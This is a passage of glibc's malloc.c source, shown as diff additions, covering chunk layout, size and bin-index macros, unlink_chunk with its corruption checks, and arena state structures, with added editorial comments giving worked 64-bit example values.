+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
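+
+/*
+  For example, on a 64-bit build (SIZE_SZ == 8) the two macros simply move
+  the pointer across the prev_size/size header words:
+
+    mchunkptr p   = ...;                  chunk header address
+    void     *mem = chunk2mem (p);        == (char *) p + 16
+    assert (mem2chunk (mem) == p);        round trip back to the header
+*/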
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Check whether REQ is small enough that padding and aligning it cannot
+   overflow (REQ must not exceed PTRDIFF_MAX).  Returns TRUE and stores the
+   padded size (at least MINSIZE) in *SZ, or returns FALSE if REQ is too
+   large.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
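+
+/*
+  A few concrete values, assuming a 64-bit build (SIZE_SZ == 8,
+  MALLOC_ALIGN_MASK == 15, MINSIZE == 32):
+
+    request2size (0)   == 32    below MINSIZE, rounded up to MINSIZE
+    request2size (24)  == 32    24 bytes plus the 8-byte size word fits in 32
+    request2size (25)  == 48    next 16-byte-aligned chunk size
+
+  checked_request2size (SIZE_MAX, &sz) returns false instead of wrapping.
+*/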
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
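+
+/*
+  For example, a size field of 0x91 on a 64-bit build describes a 0x90-byte
+  chunk whose previous neighbour is in use:
+
+    chunksize_nomask (p) == 0x91
+    chunksize (p)        == 0x90       flag bits masked off
+    prev_inuse (p)       == 1          PREV_INUSE set
+    chunk_is_mmapped (p) == 0
+    chunk_main_arena (p) == 1          NON_MAIN_ARENA clear
+*/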
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
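+
+/*
+  The repositioning trick in bin_at: on a 64-bit build
+  offsetof (struct malloc_chunk, fd) is 16, so for example
+
+    bin_at (m, 1)->fd   aliases m->bins[0]     head of the unsorted list
+    bin_at (m, 1)->bk   aliases m->bins[1]
+    bin_at (m, 2)->fd   aliases m->bins[2]     first small bin
+
+  i.e. each bin header is a fake chunk whose fd/bk fields land exactly on
+  a pair of entries in the bins[] array.
+*/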
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
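+/* Editorial illustration (not part of glibc): worked bin_index() values
+   for a typical 64-bit build (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16, so
+   SMALLBIN_CORRECTION == 0 and MIN_LARGE_SIZE == 64 * 16 == 0x400):
+
+     bin_index (0x20)    ==   2    small bin, 0x20 >> 4
+     bin_index (0x90)    ==   9    small bin, 0x90 >> 4
+     bin_index (0x3f0)   ==  63    last small bin
+     bin_index (0x400)   ==  64    first large bin, 48 + (0x400 >> 6)
+     bin_index (0x440)   ==  65    48 + (0x440 >> 6)
+     bin_index (0x20000) == 123    119 + (0x20000 >> 15)
+ */
+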
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
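+
+/* Editorial illustration (not part of glibc): for a chunk P linked
+   between A and B on a doubly linked bin list (A <-> P <-> B), the
+   checks above require, before P is spliced out, that
+
+     chunksize (P) == prev_size (next_chunk (P))
+     P->fd == B  &&  B->bk == P
+     P->bk == A  &&  A->fd == P
+
+   and only then perform B->bk = A; A->fd = B; (plus the analogous
+   fd_nextsize/bk_nextsize maintenance for large chunks).  */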
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
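+
+/* Editorial illustration (not part of glibc): with BINMAPSHIFT == 5 the
+   NBINS == 128 bins map onto BINMAPSIZE == 4 words of 32 bits each, e.g.
+
+     bin 10:  idx2block (10) == 0,  idx2bit (10) == 1 << 10 == 0x400
+     bin 65:  idx2block (65) == 2,  idx2bit (65) == 1 <<  1 == 0x2
+
+   so mark_bin (m, 65) sets bit 1 of m->binmap[2].  */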
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
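+
+/* Editorial illustration (not part of glibc): on a typical 64-bit build
+   (SIZE_SZ == 8) each fastbin holds one chunk size,
+
+     fastbin_index (0x20) == 0
+     fastbin_index (0x30) == 1
+     ...
+     fastbin_index (0x80) == 6
+
+   and, assuming the usual request2size() rounding defined earlier in
+   this file, MAX_FAST_SIZE == 160 rounds up to a 0xb0-byte chunk, so
+   NFASTBINS == fastbin_index (0xb0) + 1 == 10.  Chunks are pushed and
+   popped at the head of each list through their fd pointers (LIFO).  */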
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
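+
+/* Editorial illustration (not part of glibc): malloc_init_state() below
+   calls set_max_fast (DEFAULT_MXFAST) for the main arena; assuming the
+   usual DEFAULT_MXFAST of 64 * SIZE_SZ / 4 (0x80 on 64-bit), this gives
+
+     global_max_fast == ((0x80 + 8) & ~0xf) == 0x80
+
+   so by default only chunks of up to 0x80 bytes are fastbin candidates,
+   even though NFASTBINS leaves room for sizes up to MAX_FAST_SIZE.  */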
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
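+
+/* Editorial note (not part of glibc): bins[] above stores one fd/bk
+   pointer pair per usable bin.  Bin 0 does not exist and bin_at() is
+   1-based, so NBINS * 2 - 2 == 254 pointers cover bins 1 through 127.  */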
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
